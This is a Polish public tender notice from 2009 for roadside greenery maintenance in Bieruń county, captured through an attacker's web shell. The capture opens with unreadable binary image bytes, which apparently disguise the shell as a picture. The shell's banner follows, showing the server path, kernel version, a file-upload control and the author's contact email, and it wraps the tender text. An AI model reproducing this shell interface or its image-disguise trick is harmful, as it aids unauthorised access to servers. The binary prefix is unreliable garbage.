JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090219/40119-N-2009.html

<p class="kh_header"><b>Bieruń: Utrzymanie zieleni w pasie drogowym wzdłuż dróg powiatowych na terenie powiatu bieruńsko-lędzińskiego w 2009 r.</b><br>
<b>Numer ogłoszenia: 40119 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bieruńsko-Lędziński , ul. Jagiełły 1, 43-155 Bieruń, woj. śląskie, tel. 032 2163820, faks 032 3269287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni w pasie drogowym wzdłuż dróg powiatowych na terenie powiatu bieruńsko-lędzińskiego w 2009 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług w rozumieniu art. 2 ust. 10 ustawy p.z.p., polegających na utrzymaniu zieleni w pasie drogowym wzdłuż dróg powiatowych na terenie powiatu  bieruńsko - lędzińskiego w 2009 r.

Przedmiot zamówienia obejmuje w szczególności następujące usługi:
- ręczne czyszczenie studzienek ściekowych,
- ręczne czyszczenie przykanalików,
- oczyszczanie przepustów rurowych,
- pielęgnacja krzewów liściastych i żywopłotów,
- odmładzanie starych drzew,
- wywóz karpiny i gałęzi z miejsca wykonywanych robót,
- wykaszanie chwastów i jednorocznych samosiewów na terenie niezadrzewionym i zadrzewionym,
- ręczne ścinanie i karczowanie średniej gęstości krzaków i podszycia,
- oczyszczanie rowów z namułu z wyprofilowaniem skarp rowów.

Szczegółowy opis przedmiotu zamówienia zawierają następujące dokumenty:  Przedmiar robót, Kosztorys nakładczy oraz Założenia szczegółowe realizacji przedmiotu zamówienia oraz zalecenia i wytyczne.
Powyższy przedmiot zamówienia musi być wykonany zgodnie z wyżej wymienionymi dokumentami jak i obowiązującymi: normami, instrukcjami i innymi obowiązującymi przepisami prawa.

Miejsce wykonania usług - drogi powiatowe, powiat bieruńsko-lędziński, województwo śląskie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.20.00-0, 77.34.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy p.z.p., tj:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;      
W postępowaniu mogą wziąć udział wykonawcy, którzy są uprawnieni do występowania w obrocie prawnym, zgodnie z wymogami ustawowymi - tzn., którzy posiadają aktualne dokumenty wymienione w pkt. 4 i 5 niniejszego ogłoszenia (Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu).      
- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentów wymienionych w pkt. 4 i 5 niniejszego ogłoszenia (Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu).       
   
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 

a)	W postępowaniu mogą wziąć udział wykonawcy, którzy wykażą, że wykonali usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o łącznej wartości nie mniejszej niż 200.000,00 zł brutto;
Za usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia uznaje się usługi określone w pkt. II.1.3. niniejszego ogłoszenia (Określenie przedmiotu oraz wielkości lub zakresu zamówienia).
- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentów wymienionych w pkt. 6 niniejszego ogłoszenia (Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu).

b)	W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują lub będą dysponować potencjałem technicznym, odpowiednio:
- samochód dostawczy z zestawem do zabezpieczania i oznakowania robót - min. 1 szt.,
- podnośnik montażowy samochodowy hydrauliczny (zwyżka) - min. 1 szt.,
- rozdrabniacz gałęzi - min. 1 szt.,
- piła spalinowa - min. 5 szt.,
- kosiarka wysięgnikowa bijakowa - min. 2 szt.,
- szczotka mechaniczna z pojemnikiem - min. 1 szt.,
- przycinarka do żywopłotów - min. 2 szt.,
- kosiarka ręczna - min. 4 szt., 
- koparko-ładowarka - min. 1 szt.,
- samochód ciężarowy - min. 2 szt.;
- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentów wymienionych w pkt. 7 niniejszego ogłoszenia (Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu).

Uwaga do lit. a, i b) 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunek określony w pkt. 2) lit. a) i b) spełnia przynajmniej jeden z wykonawców lub łącznie wszyscy wykonawcy.

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 

4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie                                                art. 24 ust. 1 i 2 ustawy p.z.p.                                                                                               
- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie składanej oferty                        i oświadczeń - wymienione w pkt. 3 niniejszego ogłoszenia (Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu).
W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia, wymaga się wówczas, aby każdy z wykonawców złożył odrębne oświadczenie, że nie podlega wykluczeniu                                 z postępowania na podstawie art. 24 ust. 1 i 2 ustawy p.z.p.;

Każdy z wyżej wymienionych warunków będzie oceniany przez Zamawiającego zgodnie z formułą spełnia/nie spełnia. Podstawą oceny będą oświadczenia i dokumenty dołączone przez wykonawcę do oferty potwierdzające ich spełnianie, zgodnie z wymogami określonymi w Informacji o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu niniejszego ogłoszenia - doprecyzowujące powyższe warunki ogólne do specyfiki niniejszego zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki wykonawca spełnił.
Nie spełnienie powyższych warunków przez wykonawcę będzie skutkowało wykluczeniem wykonawcy z postępowania o udzielenie zamówienia i odrzuceniem jego oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca ubiegający się o udzielenie niniejszego zamówienia publicznego składa:
1)	wypełniony formularz ofertowy (wraz z Kosztorysem ofertowym sporządzonym na podstawie Przedmiaru robót i Kosztorysu nakładczego , do którego w celu potwierdzenia spełniania warunków udziału w postępowaniu załączy:
2)	oświadczenie  wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie   z art. 22 ust. 1 pkt. 1-3 ustawy p.z.p.;
3)	oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy p.z.p.;
4)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert;
5)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6)	wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania                       o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia o łącznej wartości nie mniejszej niż 200.000,00 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów, potwierdzających że te usługi zostały wykonane należycie. 
7)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca. 
Jeżeli wykonawca w niniejszym wykazie wskaże narzędzia i urządzenia, którymi będzie dysponował - do przedmiotowego wykazu musi załączyć pisemne zobowiązania innych podmiotów do udostępnienia narzędzi i urządzeń niezbędnych do wykonania zamówienia;
8)	stosowne pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo reprezentowaniu wykonawcy w postępowaniu i zawarciu umowy, jeżeli osoba(y) reprezentująca(e) wykonawcę w postępowaniu o udzielenie zamówienia nie jest(są) wskazana(e) jako upoważniona(e) do jego reprezentacji we właściwym rejestrze albo ewidencji działalności gospodarczej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.powiatbl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Bieruniu, ul. Warszawska 168, 43-155 Bieruń.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 11:30, miejsce: Powiatowy Zarząd Dróg w Bieruniu, 43-155 Bieruń, ul. Warszawska 168, sekretariat - pokój nr 2..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje o sposobie porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami 
1. Wszystkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i wykonawcy przekazują pisemnie w języku polskim. 
     Zamawiający dopuszcza również przekazanie oświadczeń, wniosków, zawiadomień oraz informacji faksem                                         (nr faks: (032) 216-21-73).
     Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia lub inne informacje za pomocą faksu, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
2.  Osobami uprawnionymi do porozumiewania się z wykonawcami są:
     Józef Piechula           -	Dyrektor Powiatowego Zarządu Dróg w Bieruniu
     Dorota Uzarek          -	Zastępca Dyrektora Powiatowego Zarządu Dróg w Bieruniu
     Patrycja Pamuła        -	Referent
     Telefon kontaktowy:	(032) 216-21-73
     Fax:			(032) 216-21-73
3. Informacji dotyczących postępowania o udzielenie zamówienia publicznego udziela się od poniedziałku do piątku w godz.                  od 800 do 1530.

Informacja o zamiarze zawarcia umowy ramowej:
Zamawiający nie zamierza zawierać umowy ramowej.

Informacja o zamiarze ustanowienia dynamicznego systemu zakupów wraz z adresem strony internetowej, na której będą zamieszczane dodatkowe informacje dotyczące dynamicznego systemu zakupów:

Creat By MiNi SheLL
Email: jattceo@gmail.com